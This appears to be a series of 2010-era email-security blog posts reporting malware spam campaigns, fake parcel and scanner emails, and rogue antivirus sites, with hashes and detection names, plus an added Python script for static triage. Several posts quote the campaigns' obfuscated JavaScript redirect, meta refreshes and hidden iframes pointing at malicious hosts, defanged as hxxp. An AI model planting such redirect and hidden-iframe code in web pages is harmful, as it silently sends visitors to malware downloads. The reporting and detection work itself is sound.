Spam message inside a ZIP file

Spammers often use new techniques to deliver their messages to recipients without being caught by email security solutions. Today, one such spam email caught our attention because of the original technique it used.

The spam email had the subject “Your wife photos attached”, the very short body “Your wife photos” and the attached file rooster.zip.

At first, we thought this was some new email security threat, so we investigated the ZIP archive. Once extracted, the file rooster.jpg was available. The filename does not end in .exe, nor in the combination of many spaces followed by .exe, so we opened the JPEG and got this spam advertisement for Viagra, Cialis and VPXL.

The instructions, if you are interested, are to go to med242.ru, which leads to the web site of the Canadian Pharmacy.

I can understand that spammers try different techniques but this one is, in my humble opinion, not a very good one. What a hassle to read the message.

FedEx emails with new trojan variant

MX Lab intercepted a new campaign of FedEx emails that have a trojan attached to the message. The email is sent from the spoofed address “Fedex Support, Trisha Kimble” <kyeagl@fedex.com>; please note that the name of the person can change.

Possible subjects:

Fedex Invoice Copy N25524750
Fedex Item Status N4347526
Fedex Shipment Status N0919106
Fedex Tracking Number N7897143

The body of the email does not contain any text, only an embedded image.

The email has the attachment FEDEXInvoiceEE438252OP.zip. The 36 kB file FedexInvoice_EE776129.exe is extracted from the ZIP archive.

At the time of writing, only 8 of the 42 AV engines at Virus Total detected the trojan. The trojan is known as W32/Agent.JBI (Authentium), Suspicious:W32/Malware!Gemini (F-Secure), TrojanDropper:Win32/Oficla.T (Microsoft), a variant of Win32/Kryptik.GHC (NOD32).

Virus Total permalink and MD5: 2587d5dc4b18e652532e556ac26f2290

New Oficla trojan version in emails with subject “Scan from a Xerox WorkCentre Pro”

MX Lab intercepted some emails with the subject “Scan from a Xerox WorkCentre Pro N 6204257” that contain the latest Oficla trojan variant. The emails are sent from a spoofed email address and have a subject in one of the following formats:

Scan from a Xerox WorkCentre Pro $6208924
Scan from a Xerox WorkCentre Pro #7943943
Scan from a Xerox WorkCentre Pro N9700617

Body of the email:

Please open the attached document. It was scanned and sent to you using a Xerox
WorkCentre Pro.

Sent by: Guest
Number of Images: 1
Attachment File Type: ZIP [DOC]

WorkCentre Pro Location: machine location not set
Device Name: XRX6919AA7ACDB46116749

For more information on Xerox products and solutions, please visit

http://www.xerox.com

The email contains a ZIP archive named Tax report.zip with the 56 kB file Xerox_doc.exe inside.

Virus Total permalink and MD5: eadf133be4dc58050626a5fd194fc546.

Analysis of rogue anti virus software

MX Lab reported earlier on a malware campaign that leads to rogue anti virus software and further infections of your computer, in the following articles:

Resume emails with attached file Resume.html leads to rogue AV software
Campaign with emails that lead to rogue AV software antivirus_24.exe continues
Malicious emails lead to rogue AV software antivirus_24.exe

We just managed to get a real sample of the malware and a working web site that hosts the malicious scripts and fake anti virus screens. In a comment on one of our blog posts, a commenter provided us with the following URL: hxxp://kidstylesource.com/x.html.

When we tried this one we got the iframe scripting that is used in this campaign:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;url=hxxp://cetogilco.cz.cc/scanner10/?afid=24">
</head><body>

<iframe src="hxxp://protectionreader.in/media/index.php?xml=back&rnd=img&nid=151&hash=ecard&c=4" style="visibility: hidden;" height="1" width="1">
</iframe>

</body></html>

We soon got the following screen in our browser and a pop-up window with the message that our system is infected. Oh yes, we continued to see what happens. Do not try this at home!

After clicking OK we got a screen that starts scanning the computer system. The progress bar advances very fast for an anti virus scanner, and the first alleged infections are found on your system.

A new pop-up with a Windows Security Alert appears when the scan is finished. When we clicked the Remove all button we got the option to download the 164 kB file antivirus.exe.

When submitting this file to Virus Total, 19 of the 42 AV engines detected the trojan with names like W32/Katusha.D.gen!Eldorado (Authentium), W32/Katusha.D.gen!Eldorado (F-Prot), Mal/FakeAV-EI (Sophos) or TROJ_FAKEAV.SMDO (Trend Micro).

Virus Total permalink and MD5: b9734f1148c03a7f90ad77cb81dc6f1d.

Resume emails with attached file Resume.html leads to rogue AV software

MX Lab intercepts emails with the subject Resume, an attached file Resume.html and a very short email body:

Attached, please find

The attached HTML file contains the following code:

<SCRIPT LANGUAGE="Javascript"><!--
// x decodes to: <meta http-equiv="refresh" content="0;url=hxxp://wimbert.nl/x.html">
function xhtmldecode(x){
document.write(unescape(x))
}
function runit(){
x="%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%22%30%3B%75%72%6C%3D%68%74%74%70%3A%2F%2F%77%69%6D%62%65%72%74%2E%6E%6C%2F%78%2E%68%74%6D%6C%22%3E%0D%0A"
xhtmldecode(x)
}
runit()
//-->
</script>

When opening the attached HTML file you are directed to a web site with the following code:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;url=hxxp://brocuphdislock.cz.cc/scanner10/?afid=24">
</head><body>

<iframe src="hxxp://cherrysolo.ru:8080/index.php?pid=10" style="visibility: hidden;" height="1" width="1"></iframe>
</body></html>

After 4 seconds you will get redirected to hxxp://brocuphdislock.cz.cc/scanner10/?afid=24. On our Mac computer we got the following screen.

It stayed like this for quite a while, so I guess that the scripting of this site doesn’t work too well on a Mac computer. At MX Lab, we believe that this is a new campaign to distribute the rogue anti virus software antivirus_24.exe, as mentioned in earlier blog articles:

Campaign with emails that lead to rogue AV software antivirus_24.exe continues
Malicious emails lead to rogue AV software antivirus_24.exe
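The attachment in this post hides its redirect in a percent-encoded string fed to unescape(), and the landing page chains a meta refresh with a 1x1 hidden iframe, as in the rogue AV post above. The following Python triage script is an added example, not MX Lab code: it decodes such literals and lists meta refresh targets and invisible iframes; the two samples are constructed with placeholder domains.

```python
import re
from urllib.parse import unquote

# Constructed samples modelled on the Resume.html attachment and the landing page
# described above (placeholder domains, not the real ones from the campaign).
ATTACHMENT = ('<SCRIPT LANGUAGE="Javascript"><!--\nfunction xhtmldecode(x){document.write(unescape(x))}\n'
              'function runit(){x="%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22'
              '%72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%22%30%3B%75%72%6C%3D'
              '%68%74%74%70%3A%2F%2F%65%78%61%6D%70%6C%65%2E%69%6E%76%61%6C%69%64%2F%78'
              '%2E%68%74%6D%6C%22%3E%0D%0A"\nxhtmldecode(x)}runit()//--></script>')
LANDING = ('<html><head>PLEASE WAITING 4 SECOND...\n'
           '<meta http-equiv="refresh" content="4;url=http://scanner.example.invalid/scanner10/?afid=24">\n'
           '</head><body>\n<iframe src="http://loader.example.invalid:8080/index.php?pid=10" '
           'style="visibility: hidden;" height="1" width="1"></iframe>\n</body></html>')

ENCODED_LITERAL = re.compile(r'["\']((?:%[0-9A-Fa-f]{2}){8,})["\']')   # the literal unescape() receives
META_REFRESH = re.compile(r'<meta[^>]*http-equiv\s*=\s*["\']?refresh["\']?[^>]*content\s*=\s*["\']([^"\']*)["\']', re.I)
IFRAME = re.compile(r'<iframe\b([^>]*)>', re.I)
ATTR = re.compile(r'(\w+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')

def deobfuscate(html):
    """Append the decoded form of every long %XX literal: what document.write(unescape(x)) injects."""
    decoded = [unquote(m.group(1)) for m in ENCODED_LITERAL.finditer(html)]
    return html + "\n" + "\n".join(decoded)

def meta_refresh_targets(html):
    """Return (delay_seconds, url) for every <meta http-equiv="refresh">."""
    targets = []
    for m in META_REFRESH.finditer(html):
        delay, _, rest = m.group(1).partition(";")          # e.g. '4;url=http://...'
        url = re.sub(r"^\s*url\s*=\s*", "", rest, flags=re.I).strip()
        targets.append((int(delay.strip() or 0), url))
    return targets

def hidden_iframes(html):
    """Return the src of every iframe that is 1x1/0x0 or styled invisible."""
    found = []
    for m in IFRAME.finditer(html):
        attrs = {a.group(1).lower(): (a.group(2) or a.group(3) or a.group(4) or "")
                 for a in ATTR.finditer(m.group(1))}
        tiny = attrs.get("height") in ("0", "1") or attrs.get("width") in ("0", "1")
        style = re.sub(r"\s+", "", attrs.get("style", "").lower())
        if tiny or "visibility:hidden" in style or "display:none" in style:
            found.append(attrs.get("src", ""))
    return found

def triage(html):
    """Static triage of a mail attachment or landing page: decode first, then report."""
    expanded = deobfuscate(html)
    return {"meta_refresh": meta_refresh_targets(expanded), "hidden_iframes": hidden_iframes(expanded)}
```

Run triage() over the raw attachment bytes before any browser touches them; the decoded meta refresh and the hidden iframe src are the indicators worth blocking at the gateway.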

DHL tracking emails are back with new trojan variants

For a few days now, MX Lab has been intercepting a new trojan variant in emails regarding a DHL delivery. The email comes from the spoofed address DHL Parcel Support <help.id990@dhl.com>.

Common subjects are:

DHL Delivery. Please get your parcel NR7883
DHL Delivery. Get your parcel NR7308
DHL Delivery. Get your parcel ID0290
DHL Delivery Service. Error in delivery address
DHL International. Your Parcel Number 0066
DHL Services. Get your parcel ID212
DHL Servise. Parcel number 3005
….

The body of the email:

Dear customer.

We were not able to deliver your package to your address!

Reason:” incorrect address “
Please pick up your package in local DHL office.
Scheduled Delivery: 21-August-2010

Attention!
The post label is attached to this e-mail.
We kindly ask you to print it and take it to the post office to pick up the package.

Thank you!

The trojan is known as TROJ_OFICLA.AMG (TrendMicro), Trojan:Win32/Oficla.V (Microsoft), W32/Trojan3.BXP (F-Prot), Mal/EncPk-AX (Sophos), Trojan.Oficla.AC (BitDefender).

The attached ZIP file is approx. 44 kB in size and has a name in the format Print_label_ID347a.zip. Once extracted, an .exe file is present.

Virus Total permalink and MD5: 5d16e73e05c8e03325e6971781b0af78.

New ZBot trojan in the wild

MX Lab intercepted a new ZBot trojan attached to emails with changing subjects and body content.

The following email subjects are being used:

Another candidate brought to you
EBOD Meeting MEC Update
Fw: New Taxes Coming
Summary of payments

The email body also changes with every new email version. Here are some examples:

Enjoy… email with questions.. have a great safe weekend… still need more letters… get it done!

In Unity!

Chauncey Pennington

knuts,

Attached are two files showing the amounts paid this past year.
The files are in Lotus 1-2-3 but I think you can open these in Excel or the Open office spread sheet.
This is working very nicely.

Bradley Jacobs

Hi,

This is Charles Brand working as a Technical Team Lead in IBM with over 10 years of solid mainframe development experience. I am confident that my skills will match for this requirement.

Please find the resume as a word attachment. I am available at 404-353-5442 for a discussion. BTW I am in EST time zone.

Looking forward to work with you.

Thanks
Charles

I have attached part of that document toward the bottom so you can print it out for your friends.

“Excellence is an art won by training and habituation. We do not act rightly because we have virtue or excellence, but we rather have those because we have acted rightly. We are what we repeatedly do. Excellence, then, is not an act but a habit” Aristotle

Along with the subject and body content changes, the attached ZIP file also has different file names:

2010 MEC Update.zip
2010 Financing.123.zip
resume.zip
six_months.zip

At the time of writing, only 4 of the 42 AV engines at Virus Total detected the threat. Virus Total permalink and MD5: 0f80c925e86d069e651eed8a4836f1be.

New Bredolab trojan in the wild

MX Lab intercepted a new Bredolab trojan attached to emails with changing subjects and body content.

The following email subjects are being used:

Beauty and the Geek 2
First Birthday Invitation
fill this Passport form
In USA on August 15 and 16
Resume & Coverletter – Feedback
Status
Your reservation is confirmed – Ref: 12801/267373

The email body also changes with every new email version. Here are some examples:

Hi Joe,

I will be in USA on August 15, 16 and 17. I have a job interview on August 15 and available on August 16. I wonder if you and your partners will be available to catch up on any job prospect at your company.

I have attached my resume again with few changes.

Please let me know your availability. Thank you.

Best Regards,
Salvatore

Hello,

Thank you for making a booking through Allhotels

This voucher confirms that you have paid $ 1,100.00 as a deposit for the cost of the rooms and services detailed below. The guest must present this voucher, along with photo identification matching the guest name on this voucher, to the hotel on check-in.

The hotel will also ask for a valid credit card on check-in. This is to cover incidental expenses like meals, drinks, laundry, etc. Guests are responsible for payment of all extra charges direct to the hotel.

Please find the details in the attachment.

Hello All,

Please treat this as my personal invitation , Grace the occasion with your presence and bless my elder brother’s daughter on her first birthday.

Date: Sunday, August 15

Please find the venue details in the attachment.

Thanks,
Jordan Fish

Along with the subject and body content changes, the attached ZIP file also has different file names:

Resume.zip
invitation.zip

The attached ZIP archive is around 120 kB in size; once extracted, an .exe file with the same name as the ZIP archive is unpacked.

The trojan is known as Gen:Variant.Bredo.6 (Bitdefender), W32/Zbot.AN.test!Eldorado (F-Prot), W32/Trojan3.BXW (Authentium).

The following files will be created:

%Windir%\host32.exe
%Windir%\jh87uhnoe3\ewf32.nls
%Windir%\jh87uhnoe3\ewfrvbb.nls

The following directory will be created:

%Windir%\jh87uhnoe3

Several Windows registry modifications are made on the infected system.

At the time of writing, only 6 of the 42 AV engines at Virus Total detected the threat. Virus Total permalink and MD5: 4150a1deee2bb6852095627df34defb3.

MX Lab group on LinkedIn

“Join the corporate group of MX Lab, provider of email security services like zero hour anti virus, managed anti spam and email archiving solutions. This group is open to everyone who is involved or interested in email security.”

Join the MX Lab group on LinkedIn.

Campaign with emails that lead to rogue AV software antivirus_24.exe continues

MX Lab reported yesterday on emails where famous brands are used to lead users to a web site that hosts the malicious file antivirus_24.exe.

Today, MX Lab intercepted even more of those emails leading to a web site hxxp://clinique-fuer-schoene-haut.de/x.html. This site has the following malicious code:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;url=hxxp://hoopdotami.cz.cc/scanner5/?afid=24">
</head><body>

<iframe src="hxxp://baymediagroup.com:8080/index.php?pid=10"
style="visibility: hidden;" height="1" width="1"></iframe>

</body></html>

After 4 seconds you will get redirected to hxxp://hoopdotami.cz.cc/scanner5/?afid=24.

The brands we intercepted are Ikea, Macys, Snapfish, Zappos, SurveySpot, XM, Focus Point Global and Very Best Baking. Here are some screens of the emails.

More information regarding the threat can be found in the blog post Malicious emails lead to rogue AV software antivirus_24.exe.
